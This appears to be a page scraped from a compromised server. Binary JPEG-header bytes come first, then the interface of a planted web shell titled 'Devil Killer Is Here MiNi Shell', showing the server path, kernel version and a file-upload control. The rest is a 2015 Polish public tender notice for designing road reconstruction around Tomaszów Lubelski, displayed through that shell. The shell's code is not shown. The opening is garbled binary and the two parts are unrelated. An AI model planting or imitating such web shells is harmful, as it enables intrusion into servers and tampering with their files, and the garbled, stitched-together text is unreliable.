JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150430/62133-N-2015.html

<p class="kh_header"><b>Tomaszów Lubelski: Opracowanie projektu wykonawczego na realizację zadania pn.:
Poprawa dostępności komunikacyjnej do drogi krajowej nr 17 poprzez przebudowę odcinków dróg powiatowych nr 3521L Tomaszów Lubelski - Ulhówek, nr 3543L Tomaszów Lubelski - Łaszczówka, nr 3542L Tomaszów Lubelski - Przeorsk- Korhynie, nr 3530L Jarczów - Korhynie o łącznej długości około15,680km</b><br>
<b>Numer ogłoszenia: 62133 - 2015; data zamieszczenia: 30.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Lwowska 54, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6643045, faks 084 6642273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdptomaszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu wykonawczego na realizację zadania pn.:
Poprawa dostępności komunikacyjnej do drogi krajowej nr 17 poprzez przebudowę odcinków dróg powiatowych nr 3521L Tomaszów Lubelski - Ulhówek, nr 3543L Tomaszów Lubelski - Łaszczówka, nr 3542L Tomaszów Lubelski - Przeorsk- Korhynie, nr 3530L Jarczów - Korhynie o łącznej długości około15,680km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja projektu pod nazwą: 
Opracowanie projektu wykonawczego na realizację zadania pn.:
Poprawa dostępności komunikacyjnej do drogi krajowej nr 17 poprzez przebudowę odcinków dróg powiatowych nr 3521L Tomaszów Lubelski - Ulhówek, nr 3543L Tomaszów Lubelski - Łaszczówka, nr 3542L Tomaszów Lubelski - Przeorsk- Korhynie, nr 3530L Jarczów - Korhynie o łącznej długości około15,680km
Przedmiot zamówienia obejmuje opracowanie projektu wykonawczego z podziałem na zadania:
Zadanie nr 1 Przebudowa odcinków dróg powiatowych:
- nr 3521L Tomaszów Lubelski - Ulhówek od km 0+000 do km 1+ 836,00 
- nr 3542L Tomaszów Lubelski - Łaszczówka skrzyżowanie w km 0+000 - 1+675  - nr 3543L Tomaszów Lubelski - Łaszczówka od km 2+850 do km 3+850, o łącznej długości ok. 4,511km.
Elementy projektowane przedmiotowych odcinków dróg powiatowych:
- klasa techniczna -  Z,
- kategoria obciążenia ruchem - KR1, 
- przebudowa istniejącej nawierzchni,  
- przebudowa i budowa chodników, zatok i miejsc postojowych,
- utwardzenie poboczy,
- odtworzenie systemu odwodnienia, rowy, przepusty, umocnienia,
- kompleksowe oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego,
- przebudowa skrzyżowań i zjazdów, 
- dokumentacja dendrologiczna,
 Zadanie nr 2 Przebudowa odcinka drogi powiatowej:
- nr 3542L Łaszczówka skrzyżowanie Przeorsk (koniec dz. dr. nr 760) od km 1+675 do km 6+780, długości około 5,105km.
Elementy projektowane przedmiotowych odcinków dróg powiatowych:
- klasa techniczna -  Z,
- kategoria obciążenia ruchem - KR1, 
- przebudowa istniejącej nawierzchni,  
- przebudowa i budowa chodników, zatok i miejsc postojowych,
- utwardzenie poboczy,
- odtworzenie systemu odwodnienia, rowy, przepusty, umocnienia,
- kompleksowe oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego,
- przebudowa skrzyżowań i zjazdów, 
- dokumentacja dendrologiczna,
Zadanie nr 3 Przebudowa odcinków dróg powiatowych: 
- nr 3530L Jarczów - Korhynie od km 3+500 do km 4+030 i od km  4+530 do km 7+915, - nr 3530L Przeorsk (koniec dz. dr. nr 760) - Korhynie w km 6+780 - 8+929 o łącznej dł. ok. 6,064km
Elementy projektowane przedmiotowych odcinków dróg powiatowych:
- klasa techniczna -  Z,
- kategoria obciążenia ruchem - KR1, 
- przebudowa istniejącej nawierzchni,  
- przebudowa i budowa chodników, zatok i miejsc postojowych,
- utwardzenie poboczy,
- odtworzenie systemu odwodnienia, rowy, przepusty, umocnienia,
- kompleksowe oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego,
- przebudowa skrzyżowań i zjazdów, 
- dokumentacja dendrologiczna,
Łącznie długość przebudowywanych odcinków dróg powiatowych wynosi około 15,680km
2. Zakres opracowania i wystąpień wykonawcy związanych z opracowaniem dokumentacji projektowej dla poszczególnych zadań.
2.1. Zadanie nr 1 
1)Uzyskać   mapę  sytuacyjno - wysokościową  wg potrzeb projektującego.
2) Kosztorysy inwestorskie  - (1 egz.  w wersji papierowej + 1 wersja elektroniczna w formacie PDF.)
3) Szczegółową specyfikację techniczną wykonania i odbioru robót ujętych w przedmiarze- (3 egz.) 
4) Sporządzenie planu bezpieczeństwa i ochrony zdrowia - BIOZ (2 egz.)
5) Przekazać dane niezbędne Zamawiającemu dot. opracowania operatu wodno - prawnego w terminie do 10 sierpnia 2015r.
6) Projekty stałej i tymczasowej organizacji ruchu drogowego/ zatwierdzone przez organ   zarządzający   ruchem /- (3 egz. w wersji papierowej + 1 wersja elektroniczna)
7) Dokumentacja dendrologiczna - (3 egz.)
8) Plan zagospodarowania terenu i przekrój konstrukcyjny należy uzgodnić z Zamawiającym w trakcie realizacji przedmiotu zamówienia.
9) Projekt wykonawczy opracować należy w pięciu egzemplarzach, natomiast przekazanie dokumentacji nastąpi w siedzibie zamawiającego, a sporządzony na tą okoliczność protokół zdawczo - odbiorczy będzie podstawą do wystawienia faktury zamawiającemu za zrealizowane zamówienie.
10) Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD-R dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być tożsama z wersją pisemną (papierową). Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym (papierowym).
2.2. Zadanie nr 2
1)Uzyskać   mapę  sytuacyjno - wysokościową  wg potrzeb projektującego.
2) Kosztorysy inwestorskie  - (1 egz.  w wersji papierowej + 1 wersja elektroniczna w formacie PDF.)
3) Szczegółową specyfikację techniczną wykonania i odbioru robót ujętych w przedmiarze- (3 egz.) 
4) Sporządzenie planu bezpieczeństwa i ochrony zdrowia - BIOZ (2 egz.)
5) Przekazać dane niezbędne Zamawiającemu dot. opracowania operatu wodno - prawnego w terminie do 10 sierpnia 2015r.
6) Projekty stałej i tymczasowej organizacji ruchu drogowego/ zatwierdzone przez organ   zarządzający   ruchem /- (3 egz. w wersji papierowej + 1 wersja elektroniczna)
7) Dokumentacja dendrologiczna - (3 egz.)
8) Plan zagospodarowania terenu i przekrój konstrukcyjny należy uzgodnić z Zamawiającym w trakcie realizacji przedmiotu zamówienia.
9) Projekt wykonawczy opracować należy w pięciu egzemplarzach, natomiast przekazanie dokumentacji nastąpi w siedzibie zamawiającego, a sporządzony na tą okoliczność protokół zdawczo - odbiorczy będzie podstawą do wystawienia faktury zamawiającemu za zrealizowane zamówienie.
10) Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD-R dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być tożsama z wersją pisemną (papierową). Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym (papierowym).
2.3. Zadanie nr 3 
1)Uzyskać   mapę  sytuacyjno - wysokościową  wg potrzeb projektującego. Sporządzić mapę sytuacyjno - wysokościową na brakujący odcinek drogi nr 3530L Przeorsk - Korhynie około 0,500km.
2) Kosztorysy inwestorskie  - (1 egz.  w wersji papierowej + 1 wersja elektroniczna w formacie PDF.)
3) Szczegółową specyfikację techniczną wykonania i odbioru robót ujętych w przedmiarze- (3 egz.) 
4) Sporządzenie planu bezpieczeństwa i ochrony zdrowia - BIOZ (2 egz.)
5) Przekazać dane niezbędne Zamawiającemu dot. opracowania operatu wodno - prawnego w terminie do 10 sierpnia 2015r.
6) Projekty stałej i tymczasowej organizacji ruchu drogowego/ zatwierdzone przez organ   zarządzający   ruchem /- (3 egz. w wersji papierowej + 1 wersja elektroniczna)
7) Dokumentacja dendrologiczna - (3 egz.)
8) Plan zagospodarowania terenu i przekrój konstrukcyjny należy uzgodnić z Zamawiającym w trakcie realizacji przedmiotu zamówienia.
9) Projekt wykonawczy opracować należy w pięciu egzemplarzach, natomiast przekazanie dokumentacji nastąpi w siedzibie zamawiającego, a sporządzony na tą okoliczność protokół zdawczo - odbiorczy będzie podstawą do wystawienia faktury zamawiającemu za zrealizowane zamówienie.
10) Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD-R dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być tożsama z wersją pisemną (papierową). Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym (papierowym)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień o  wartości nie więcej niż 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 86.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
- Dla Zadania nr 1 wynosi 1 200 zł (słownie: jeden tysiąc dwieście złotych)
- Dla Zadania nr 2 wynosi 1 500 zł (słownie: jeden tysiąc pięćset  złotych).
- Dla Zadania nr 3 wynosi 1 800 zł (słownie: jeden tysiąc osiemset  złotych).
2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, wg uznania Wykonawcy:
a. pieniądzu, przelewem na rachunek bankowy: w B.S. w Łaszczowie 77 9620 0005 0000 3548 2001 0004 z dopiskiem  TN.3721.05.2015.AZ - Zadanie nr 1,  Zadanie nr 2, Zadanie nr 3.
b. poręczeniach bankowych;
c. poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d. gwarancjach bankowych;
e. gwarancjach ubezpieczeniowych;
f. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wadium wnoszone w formie poręczeń  lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. Wadium wnoszone w w/w. formie powinno być wystawione na Zamawiającego. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.
4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
5. Warunki zwrotu i utraty wadium reguluje ustawa Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 1 
Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykażą co najmniej jedną usługę polegającą na wykonaniu projektu przebudowy lub budowy dróg o wartości zadania brutto min 30 000,00 zł (słownie: trzydzieści tysięcy złotych), oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień podpisania Protokołu odbioru lub równoważnego dokumentu.
Zadanie nr 2 
Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykażą co najmniej jedną usługę polegającą na wykonaniu projektu przebudowy lub budowy dróg o wartości zadania brutto min 30 000,00 zł (słownie: trzydzieści tysięcy złotych), oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień podpisania Protokołu odbioru lub równoważnego dokumentu.
Zadanie nr 3
Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykażą co najmniej jedną usługę polegającą na wykonaniu projektu przebudowy lub budowy dróg o wartości zadania brutto min 30 000,00 zł (słownie: trzydzieści tysięcy złotych), oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień podpisania Protokołu odbioru lub równoważnego dokumentu.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.
W rozumieniu art. 23 ust. 1 Wykonawcy mogą ubiegać się wspólnie o udzielnie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast spełnianie warunków wskazanych w art. 22 ust. 1 ustawy Pzp  Wykonawcy wykazują łącznie. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
 Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
 Sprawdzenie  warunków  udziału  w  postępowaniu  odbywać  się będzie na  podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń  na zasadzie spełnia/nie spełnia. Z treści złożonych dokumentów musi jednoznacznie wynikać, iż wyżej wymienione warunki zostały spełnione przez wykonawcę.
 Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy podlegają wykluczeniu na  podstawie przepisów art. 24 ust. 1 i 2 Prawa zamówień publicznych
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają minimalne kwalifikacje zawodowe, odpowiednie do funkcji, jakie zostaną im powierzone. Wykonawca, na każdą funkcję wymienioną poniżej, wskaże osoby, które spełniają następujące wymagania tj.: 
Dla Zadania nr 1 
-  minimalna liczba osób: 1
- minimalne kwalifikacje zawodowe: osoba ta powinna posiadać uprawnienia budowlane do projektowania  w specjalności drogowej.
Dla Zadania nr 2 
-  minimalna liczba osób: 1
- minimalne kwalifikacje zawodowe: osoba ta powinna posiadać uprawnienia budowlane do projektowania  w specjalności drogowej.
Dla Zadania nr 3 
-  minimalna liczba osób: 1
- minimalne kwalifikacje zawodowe: osoba ta powinna posiadać uprawnienia budowlane do projektowania  w specjalności drogowej.
Jeżeli wykonawca nie dysponuje w/w osobami, to przedstawi pisemne  zobowiązanie innych podmiotów do udostępnienia w/w osób  które będą uczestniczyć w realizacji zamówienia.
W rozumieniu art. 23 ust. 1 Wykonawcy mogą ubiegać się wspólnie o udzielnie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast spełnianie warunków wskazanych w art. 22 ust. 1 ustawy Pzp  Wykonawcy wykazują łącznie. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
 Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
 Sprawdzenie  warunków  udziału  w  postępowaniu  odbywać  się będzie na  podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń  na zasadzie spełnia/nie spełnia. Z treści złożonych dokumentów musi jednoznacznie wynikać, iż wyżej wymienione warunki zostały spełnione przez wykonawcę.
 Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy podlegają wykluczeniu na  podstawie przepisów art. 24 ust. 1 i 2 Prawa zamówień publicznych
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - skrócenie terminu wykonania zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy - Prawo zamówień publicznych dopuszcza zmiany zawartej umowy:
1)siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
2)zmiana obowiązującej stawki VAT,
